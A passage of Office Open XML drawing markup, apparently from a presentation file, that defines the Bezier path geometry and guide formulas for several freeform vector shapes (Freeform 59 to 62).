                    <a:gd name="T40" fmla="*/ 9 w 85"/>
                    <a:gd name="T41" fmla="*/ 87 h 99"/>
                    <a:gd name="T42" fmla="*/ 43 w 85"/>
                    <a:gd name="T43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5" h="99">
                      <a:moveTo>
                        <a:pt x="43" y="99"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="99"/>
                        <a:pt x="85" y="86"/>
                        <a:pt x="85" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="45"/>
                        <a:pt x="63" y="40"/>
                        <a:pt x="55" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="38"/>
                        <a:pt x="52" y="38"/>
                        <a:pt x="52" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="33"/>
                        <a:pt x="29" y="32"/>
                        <a:pt x="29" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="21"/>
                        <a:pt x="38" y="21"/>
                        <a:pt x="40" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="21"/>
                        <a:pt x="55" y="24"/>
                        <a:pt x="55" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="34"/>
                        <a:pt x="55" y="34"/>
                        <a:pt x="55" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="34"/>
                        <a:pt x="82" y="34"/>
                        <a:pt x="82" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="31"/>
                        <a:pt x="82" y="31"/>
                        <a:pt x="82" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="12"/>
                        <a:pt x="66" y="0"/>
                        <a:pt x="41" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="0"/>
                        <a:pt x="3" y="10"/>
                        <a:pt x="3" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="50"/>
                        <a:pt x="22" y="55"/>
                        <a:pt x="33" y="58"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="58"/>
                        <a:pt x="37" y="59"/>
                        <a:pt x="39" y="59"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="62"/>
                        <a:pt x="58" y="64"/>
                        <a:pt x="58" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="77"/>
                        <a:pt x="47" y="77"/>
                        <a:pt x="43" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="77"/>
                        <a:pt x="26" y="76"/>
                        <a:pt x="26" y="64"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="61"/>
                        <a:pt x="26" y="61"/>
                        <a:pt x="26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0" y="73"/>
                        <a:pt x="3" y="81"/>
                        <a:pt x="9" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="95"/>
                        <a:pt x="29" y="99"/>
                        <a:pt x="43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97" name="Freeform 59">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C90CF578-636E-0A4F-B299-C04A5CFA7A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2037" y="24056999"/>
                  <a:ext cx="1000125" cy="865188"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 152 w 236"/>
                    <a:gd name="T1" fmla="*/ 43 h 204"/>
                    <a:gd name="T2" fmla="*/ 152 w 236"/>
                    <a:gd name="T3" fmla="*/ 43 h 204"/>
                    <a:gd name="T4" fmla="*/ 145 w 236"/>
                    <a:gd name="T5" fmla="*/ 51 h 204"/>
                    <a:gd name="T6" fmla="*/ 143 w 236"/>
                    <a:gd name="T7" fmla="*/ 53 h 204"/>
                    <a:gd name="T8" fmla="*/ 137 w 236"/>
                    <a:gd name="T9" fmla="*/ 60 h 204"/>
                    <a:gd name="T10" fmla="*/ 135 w 236"/>
                    <a:gd name="T11" fmla="*/ 63 h 204"/>
                    <a:gd name="T12" fmla="*/ 130 w 236"/>
                    <a:gd name="T13" fmla="*/ 71 h 204"/>
                    <a:gd name="T14" fmla="*/ 127 w 236"/>
                    <a:gd name="T15" fmla="*/ 74 h 204"/>
                    <a:gd name="T16" fmla="*/ 120 w 236"/>
                    <a:gd name="T17" fmla="*/ 84 h 204"/>
                    <a:gd name="T18" fmla="*/ 113 w 236"/>
                    <a:gd name="T19" fmla="*/ 93 h 204"/>
                    <a:gd name="T20" fmla="*/ 112 w 236"/>
                    <a:gd name="T21" fmla="*/ 95 h 204"/>
                    <a:gd name="T22" fmla="*/ 108 w 236"/>
                    <a:gd name="T23" fmla="*/ 101 h 204"/>
                    <a:gd name="T24" fmla="*/ 105 w 236"/>
                    <a:gd name="T25" fmla="*/ 105 h 204"/>
                    <a:gd name="T26" fmla="*/ 103 w 236"/>
                    <a:gd name="T27" fmla="*/ 107 h 204"/>
                    <a:gd name="T28" fmla="*/ 82 w 236"/>
                    <a:gd name="T29" fmla="*/ 139 h 204"/>
                    <a:gd name="T30" fmla="*/ 82 w 236"/>
                    <a:gd name="T31" fmla="*/ 139 h 204"/>
                    <a:gd name="T32" fmla="*/ 81 w 236"/>
                    <a:gd name="T33" fmla="*/ 140 h 204"/>
                    <a:gd name="T34" fmla="*/ 79 w 236"/>
                    <a:gd name="T35" fmla="*/ 142 h 204"/>
                    <a:gd name="T36" fmla="*/ 79 w 236"/>
                    <a:gd name="T37" fmla="*/ 143 h 204"/>
                    <a:gd name="T38" fmla="*/ 70 w 236"/>
                    <a:gd name="T39" fmla="*/ 157 h 204"/>
                    <a:gd name="T40" fmla="*/ 63 w 236"/>
                    <a:gd name="T41" fmla="*/ 151 h 204"/>
                    <a:gd name="T42" fmla="*/ 63 w 236"/>
                    <a:gd name="T43" fmla="*/ 151 h 204"/>
                    <a:gd name="T44" fmla="*/ 60 w 236"/>
                    <a:gd name="T45" fmla="*/ 147 h 204"/>
                    <a:gd name="T46" fmla="*/ 47 w 236"/>
                    <a:gd name="T47" fmla="*/ 135 h 204"/>
                    <a:gd name="T48" fmla="*/ 29 w 236"/>
                    <a:gd name="T49" fmla="*/ 118 h 204"/>
                    <a:gd name="T50" fmla="*/ 26 w 236"/>
                    <a:gd name="T51" fmla="*/ 121 h 204"/>
                    <a:gd name="T52" fmla="*/ 2 w 236"/>
                    <a:gd name="T53" fmla="*/ 140 h 204"/>
                    <a:gd name="T54" fmla="*/ 2 w 236"/>
                    <a:gd name="T55" fmla="*/ 140 h 204"/>
                    <a:gd name="T56" fmla="*/ 0 w 236"/>
                    <a:gd name="T57" fmla="*/ 142 h 204"/>
                    <a:gd name="T58" fmla="*/ 47 w 236"/>
                    <a:gd name="T59" fmla="*/ 204 h 204"/>
                    <a:gd name="T60" fmla="*/ 91 w 236"/>
                    <a:gd name="T61" fmla="*/ 199 h 204"/>
                    <a:gd name="T62" fmla="*/ 133 w 236"/>
                    <a:gd name="T63" fmla="*/ 129 h 204"/>
                    <a:gd name="T64" fmla="*/ 133 w 236"/>
                    <a:gd name="T65" fmla="*/ 129 h 204"/>
                    <a:gd name="T66" fmla="*/ 143 w 236"/>
                    <a:gd name="T67" fmla="*/ 114 h 204"/>
                    <a:gd name="T68" fmla="*/ 144 w 236"/>
                    <a:gd name="T69" fmla="*/ 111 h 204"/>
                    <a:gd name="T70" fmla="*/ 154 w 236"/>
                    <a:gd name="T71" fmla="*/ 96 h 204"/>
                    <a:gd name="T72" fmla="*/ 161 w 236"/>
                    <a:gd name="T73" fmla="*/ 86 h 204"/>
                    <a:gd name="T74" fmla="*/ 167 w 236"/>
                    <a:gd name="T75" fmla="*/ 77 h 204"/>
                    <a:gd name="T76" fmla="*/ 236 w 236"/>
                    <a:gd name="T77" fmla="*/ 0 h 204"/>
                    <a:gd name="T78" fmla="*/ 193 w 236"/>
                    <a:gd name="T79" fmla="*/ 0 h 204"/>
                    <a:gd name="T80" fmla="*/ 152 w 236"/>
                    <a:gd name="T81" fmla="*/ 43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6" h="204">
                      <a:moveTo>
                        <a:pt x="152" y="43"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="152" y="43"/>
                        <a:pt x="152" y="43"/>
                        <a:pt x="152" y="43"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="46"/>
                        <a:pt x="147" y="49"/>
                        <a:pt x="145" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="144" y="52"/>
                        <a:pt x="144" y="53"/>
                        <a:pt x="143" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="56"/>
                        <a:pt x="139" y="58"/>
                        <a:pt x="137" y="60"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="61"/>
                        <a:pt x="136" y="62"/>
                        <a:pt x="135" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="133" y="66"/>
                        <a:pt x="132" y="68"/>
                        <a:pt x="130" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="129" y="72"/>
                        <a:pt x="128" y="73"/>
                        <a:pt x="127" y="74"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="125" y="77"/>
                        <a:pt x="122" y="81"/>
                        <a:pt x="120" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="117" y="88"/>
                        <a:pt x="115" y="91"/>
                        <a:pt x="113" y="93"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="113" y="94"/>
                        <a:pt x="112" y="95"/>
                        <a:pt x="112" y="95"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="97"/>
                        <a:pt x="109" y="99"/>
                        <a:pt x="108" y="101"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="103"/>
                        <a:pt x="106" y="104"/>
                        <a:pt x="105" y="105"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104" y="106"/>
                        <a:pt x="104" y="107"/>
                        <a:pt x="103" y="107"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="94" y="121"/>
                        <a:pt x="87" y="131"/>
                        <a:pt x="82" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="139"/>
                        <a:pt x="82" y="139"/>
                        <a:pt x="82" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="81" y="139"/>
                        <a:pt x="81" y="139"/>
                        <a:pt x="81" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="141"/>
                        <a:pt x="80" y="142"/>
                        <a:pt x="79" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="143"/>
                        <a:pt x="79" y="143"/>
                        <a:pt x="79" y="143"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="153"/>
                        <a:pt x="70" y="157"/>
                        <a:pt x="70" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="151"/>
                        <a:pt x="63" y="151"/>
                        <a:pt x="63" y="151"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="151"/>
                        <a:pt x="63" y="151"/>
                        <a:pt x="63" y="151"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="147"/>
                        <a:pt x="60" y="147"/>
                        <a:pt x="60" y="147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="135"/>
                        <a:pt x="47" y="135"/>
                        <a:pt x="47" y="135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="118"/>
                        <a:pt x="29" y="118"/>
                        <a:pt x="29" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="121"/>
                        <a:pt x="26" y="121"/>
                        <a:pt x="26" y="121"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="140"/>
                        <a:pt x="2" y="140"/>
                        <a:pt x="2" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="140"/>
                        <a:pt x="2" y="140"/>
                        <a:pt x="2" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="142"/>
                        <a:pt x="0" y="142"/>
                        <a:pt x="0" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="204"/>
                        <a:pt x="47" y="204"/>
                        <a:pt x="47" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="199"/>
                        <a:pt x="91" y="199"/>
                        <a:pt x="91" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="199"/>
                        <a:pt x="108" y="169"/>
                        <a:pt x="133" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="133" y="129"/>
                        <a:pt x="133" y="129"/>
                        <a:pt x="133" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="124"/>
                        <a:pt x="140" y="119"/>
                        <a:pt x="143" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="143" y="113"/>
                        <a:pt x="144" y="112"/>
                        <a:pt x="144" y="111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="106"/>
                        <a:pt x="151" y="101"/>
                        <a:pt x="154" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="157" y="92"/>
                        <a:pt x="159" y="89"/>
                        <a:pt x="161" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="163" y="83"/>
                        <a:pt x="165" y="80"/>
                        <a:pt x="167" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="201" y="31"/>
                        <a:pt x="236" y="0"/>
                        <a:pt x="236" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="0"/>
                        <a:pt x="193" y="0"/>
                        <a:pt x="193" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="0"/>
                        <a:pt x="176" y="15"/>
                        <a:pt x="152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199" name="Freeform 60">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81690FBE-2777-7B43-B068-1D417E616B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21612" y="24196699"/>
                  <a:ext cx="139700" cy="153988"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 6 w 33"/>
                    <a:gd name="T1" fmla="*/ 0 h 36"/>
                    <a:gd name="T2" fmla="*/ 0 w 33"/>
                    <a:gd name="T3" fmla="*/ 0 h 36"/>
                    <a:gd name="T4" fmla="*/ 0 w 33"/>
                    <a:gd name="T5" fmla="*/ 36 h 36"/>
                    <a:gd name="T6" fmla="*/ 6 w 33"/>
                    <a:gd name="T7" fmla="*/ 36 h 36"/>
                    <a:gd name="T8" fmla="*/ 26 w 33"/>
                    <a:gd name="T9" fmla="*/ 31 h 36"/>
                    <a:gd name="T10" fmla="*/ 33 w 33"/>
                    <a:gd name="T11" fmla="*/ 17 h 36"/>
                    <a:gd name="T12" fmla="*/ 6 w 33"/>
                    <a:gd name="T13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36">
                      <a:moveTo>
                        <a:pt x="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6" y="36"/>
                        <a:pt x="6" y="36"/>
                        <a:pt x="6" y="36"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="36"/>
                        <a:pt x="21" y="34"/>
                        <a:pt x="26" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="28"/>
                        <a:pt x="33" y="24"/>
                        <a:pt x="33" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="6"/>
                        <a:pt x="24" y="0"/>
                        <a:pt x="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00" name="Freeform 61">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B93BE7F-F1DE-DD49-A255-5BDAEDE549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21799" y="24439586"/>
                  <a:ext cx="139700" cy="139700"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 33"/>
                    <a:gd name="T1" fmla="*/ 12 h 33"/>
                    <a:gd name="T2" fmla="*/ 0 w 33"/>
                    <a:gd name="T3" fmla="*/ 33 h 33"/>
                    <a:gd name="T4" fmla="*/ 33 w 33"/>
                    <a:gd name="T5" fmla="*/ 23 h 33"/>
                    <a:gd name="T6" fmla="*/ 22 w 33"/>
                    <a:gd name="T7" fmla="*/ 0 h 33"/>
                    <a:gd name="T8" fmla="*/ 14 w 33"/>
                    <a:gd name="T9" fmla="*/ 1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33">
                      <a:moveTo>
                        <a:pt x="14" y="12"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="19"/>
                        <a:pt x="5" y="26"/>
                        <a:pt x="0" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="23"/>
                        <a:pt x="33" y="23"/>
                        <a:pt x="33" y="23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9" y="4"/>
                        <a:pt x="16" y="8"/>
                        <a:pt x="14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01" name="Freeform 62">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD32554D-80B2-B04F-94F9-9EFF032F768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762812" y="23629961"/>
                  <a:ext cx="2038350" cy="1436688"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 319 w 481"/>
                    <a:gd name="T1" fmla="*/ 242 h 339"/>
                    <a:gd name="T2" fmla="*/ 317 w 481"/>
                    <a:gd name="T3" fmla="*/ 242 h 339"/>
                    <a:gd name="T4" fmla="*/ 278 w 481"/>
                    <a:gd name="T5" fmla="*/ 237 h 339"/>
                    <a:gd name="T6" fmla="*/ 249 w 481"/>
                    <a:gd name="T7" fmla="*/ 223 h 339"/>
                    <a:gd name="T8" fmla="*/ 231 w 481"/>
                    <a:gd name="T9" fmla="*/ 201 h 339"/>
                    <a:gd name="T10" fmla="*/ 225 w 481"/>
                    <a:gd name="T11" fmla="*/ 172 h 339"/>
                    <a:gd name="T12" fmla="*/ 232 w 481"/>
                    <a:gd name="T13" fmla="*/ 144 h 339"/>
                    <a:gd name="T14" fmla="*/ 250 w 481"/>
                    <a:gd name="T15" fmla="*/ 121 h 339"/>
                    <a:gd name="T16" fmla="*/ 278 w 481"/>
                    <a:gd name="T17" fmla="*/ 107 h 339"/>
                    <a:gd name="T18" fmla="*/ 315 w 481"/>
                    <a:gd name="T19" fmla="*/ 102 h 339"/>
                    <a:gd name="T20" fmla="*/ 343 w 481"/>
                    <a:gd name="T21" fmla="*/ 104 h 339"/>
                    <a:gd name="T22" fmla="*/ 358 w 481"/>
                    <a:gd name="T23" fmla="*/ 109 h 339"/>
                    <a:gd name="T24" fmla="*/ 357 w 481"/>
                    <a:gd name="T25" fmla="*/ 145 h 339"/>
                    <a:gd name="T26" fmla="*/ 340 w 481"/>
                    <a:gd name="T27" fmla="*/ 138 h 339"/>
                    <a:gd name="T28" fmla="*/ 320 w 481"/>
                    <a:gd name="T29" fmla="*/ 135 h 339"/>
                    <a:gd name="T30" fmla="*/ 291 w 481"/>
                    <a:gd name="T31" fmla="*/ 145 h 339"/>
                    <a:gd name="T32" fmla="*/ 280 w 481"/>
                    <a:gd name="T33" fmla="*/ 172 h 339"/>
                    <a:gd name="T34" fmla="*/ 283 w 481"/>
                    <a:gd name="T35" fmla="*/ 188 h 339"/>
                    <a:gd name="T36" fmla="*/ 292 w 481"/>
                    <a:gd name="T37" fmla="*/ 200 h 339"/>
                    <a:gd name="T38" fmla="*/ 306 w 481"/>
                    <a:gd name="T39" fmla="*/ 207 h 339"/>
                    <a:gd name="T40" fmla="*/ 323 w 481"/>
                    <a:gd name="T41" fmla="*/ 209 h 339"/>
                    <a:gd name="T42" fmla="*/ 342 w 481"/>
                    <a:gd name="T43" fmla="*/ 207 h 339"/>
                    <a:gd name="T44" fmla="*/ 361 w 481"/>
                    <a:gd name="T45" fmla="*/ 202 h 339"/>
                    <a:gd name="T46" fmla="*/ 361 w 481"/>
                    <a:gd name="T47" fmla="*/ 207 h 339"/>
                    <a:gd name="T48" fmla="*/ 365 w 481"/>
                    <a:gd name="T49" fmla="*/ 203 h 339"/>
                    <a:gd name="T50" fmla="*/ 373 w 481"/>
                    <a:gd name="T51" fmla="*/ 211 h 339"/>
                    <a:gd name="T52" fmla="*/ 382 w 481"/>
                    <a:gd name="T53" fmla="*/ 220 h 339"/>
                    <a:gd name="T54" fmla="*/ 382 w 481"/>
                    <a:gd name="T55" fmla="*/ 104 h 339"/>
                    <a:gd name="T56" fmla="*/ 435 w 481"/>
                    <a:gd name="T57" fmla="*/ 104 h 339"/>
                    <a:gd name="T58" fmla="*/ 435 w 481"/>
                    <a:gd name="T59" fmla="*/ 192 h 339"/>
                    <a:gd name="T60" fmla="*/ 444 w 481"/>
                    <a:gd name="T61" fmla="*/ 178 h 339"/>
                    <a:gd name="T62" fmla="*/ 481 w 481"/>
                    <a:gd name="T63" fmla="*/ 132 h 339"/>
                    <a:gd name="T64" fmla="*/ 421 w 481"/>
                    <a:gd name="T65" fmla="*/ 0 h 339"/>
                    <a:gd name="T66" fmla="*/ 0 w 481"/>
                    <a:gd name="T67" fmla="*/ 23 h 339"/>
                    <a:gd name="T68" fmla="*/ 117 w 481"/>
                    <a:gd name="T69" fmla="*/ 339 h 339"/>
                    <a:gd name="T70" fmla="*/ 340 w 481"/>
                    <a:gd name="T71" fmla="*/ 270 h 339"/>
                    <a:gd name="T72" fmla="*/ 325 w 481"/>
                    <a:gd name="T73" fmla="*/ 250 h 339"/>
                    <a:gd name="T74" fmla="*/ 319 w 481"/>
                    <a:gd name="T75" fmla="*/ 242 h 339"/>
                    <a:gd name="T76" fmla="*/ 386 w 481"/>
                    <a:gd name="T77" fmla="*/ 40 h 339"/>
                    <a:gd name="T78" fmla="*/ 408 w 481"/>
                    <a:gd name="T79" fmla="*/ 32 h 339"/>
                    <a:gd name="T80" fmla="*/ 431 w 481"/>
                    <a:gd name="T81" fmla="*/ 40 h 339"/>
                    <a:gd name="T82" fmla="*/ 440 w 481"/>
                    <a:gd name="T83" fmla="*/ 62 h 339"/>
                    <a:gd name="T84" fmla="*/ 431 w 481"/>
                    <a:gd name="T85" fmla="*/ 83 h 339"/>
                    <a:gd name="T86" fmla="*/ 408 w 481"/>
                    <a:gd name="T87" fmla="*/ 91 h 339"/>
                    <a:gd name="T88" fmla="*/ 386 w 481"/>
                    <a:gd name="T89" fmla="*/ 83 h 339"/>
                    <a:gd name="T90" fmla="*/ 377 w 481"/>
                    <a:gd name="T91" fmla="*/ 62 h 339"/>
                    <a:gd name="T92" fmla="*/ 386 w 481"/>
                    <a:gd name="T93" fmla="*/ 40 h 339"/>
                    <a:gd name="T94" fmla="*/ 209 w 481"/>
                    <a:gd name="T95" fmla="*/ 172 h 339"/>
                    <a:gd name="T96" fmla="*/ 194 w 481"/>
                    <a:gd name="T97" fmla="*/ 187 h 339"/>
                    <a:gd name="T98" fmla="*/ 171 w 481"/>
                    <a:gd name="T99" fmla="*/ 196 h 339"/>
                    <a:gd name="T100" fmla="*/ 141 w 481"/>
                    <a:gd name="T101" fmla="*/ 199 h 339"/>
                    <a:gd name="T102" fmla="*/ 132 w 481"/>
                    <a:gd name="T103" fmla="*/ 199 h 339"/>
                    <a:gd name="T104" fmla="*/ 132 w 481"/>
                    <a:gd name="T105" fmla="*/ 240 h 339"/>
                    <a:gd name="T106" fmla="*/ 80 w 481"/>
                    <a:gd name="T107" fmla="*/ 240 h 339"/>
                    <a:gd name="T108" fmla="*/ 80 w 481"/>
                    <a:gd name="T109" fmla="*/ 104 h 339"/>
                    <a:gd name="T110" fmla="*/ 141 w 481"/>
                    <a:gd name="T111" fmla="*/ 104 h 339"/>
                    <a:gd name="T112" fmla="*/ 195 w 481"/>
                    <a:gd name="T113" fmla="*/ 116 h 339"/>
                    <a:gd name="T114" fmla="*/ 215 w 481"/>
                    <a:gd name="T115" fmla="*/ 151 h 339"/>
                    <a:gd name="T116" fmla="*/ 209 w 481"/>
                    <a:gd name="T117" fmla="*/ 172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81" h="339">
                      <a:moveTo>
                        <a:pt x="319" y="242"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="318" y="242"/>
                        <a:pt x="317" y="242"/>
                        <a:pt x="317" y="242"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="302" y="242"/>
                        <a:pt x="289" y="240"/>
                        <a:pt x="278" y="237"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="267" y="234"/>
                        <a:pt x="257" y="229"/>
                        <a:pt x="249" y="223"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="241" y="217"/>
                        <a:pt x="235" y="210"/>
                        <a:pt x="231" y="201"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="227" y="193"/>
                        <a:pt x="225" y="183"/>
                        <a:pt x="225" y="172"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="225" y="162"/>
                        <a:pt x="227" y="152"/>
                        <a:pt x="232" y="144"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="236" y="135"/>
                        <a:pt x="242" y="128"/>
                        <a:pt x="250" y="121"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="258" y="115"/>
                        <a:pt x="267" y="111"/>
                        <a:pt x="278" y="107"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="289" y="104"/>
                        <a:pt x="301" y="102"/>
                        <a:pt x="315" y="102"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="325" y="102"/>
                        <a:pt x="334" y="102"/>
                        <a:pt x="343" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="351" y="106"/>
                        <a:pt x="351" y="106"/>
                        <a:pt x="358" y="109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="357" y="145"/>
                        <a:pt x="357" y="145"/>
                        <a:pt x="357" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="352" y="142"/>
                        <a:pt x="347" y="140"/>
                        <a:pt x="340" y="138"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="334" y="136"/>
                        <a:pt x="327" y="135"/>
                        <a:pt x="320" y="135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="308" y="135"/>
                        <a:pt x="298" y="138"/>
                        <a:pt x="291" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="283" y="151"/>
                        <a:pt x="280" y="160"/>
                        <a:pt x="280" y="172"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="280" y="178"/>
                        <a:pt x="281" y="184"/>
                        <a:pt x="283" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="285" y="193"/>
                        <a:pt x="289" y="197"/>
                        <a:pt x="292" y="200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="296" y="203"/>
                        <a:pt x="301" y="205"/>
                        <a:pt x="306" y="207"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="312" y="209"/>
                        <a:pt x="317" y="209"/>
                        <a:pt x="323" y="209"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="329" y="209"/>
                        <a:pt x="336" y="209"/>
                        <a:pt x="342" y="207"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="348" y="206"/>
                        <a:pt x="354" y="204"/>
                        <a:pt x="361" y="202"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="361" y="207"/>
                        <a:pt x="361" y="207"/>
                        <a:pt x="361" y="207"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="365" y="203"/>
                        <a:pt x="365" y="203"/>
                        <a:pt x="365" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="373" y="211"/>
                        <a:pt x="373" y="211"/>
                        <a:pt x="373" y="211"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="382" y="220"/>
                        <a:pt x="382" y="220"/>
                        <a:pt x="382" y="220"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="382" y="104"/>
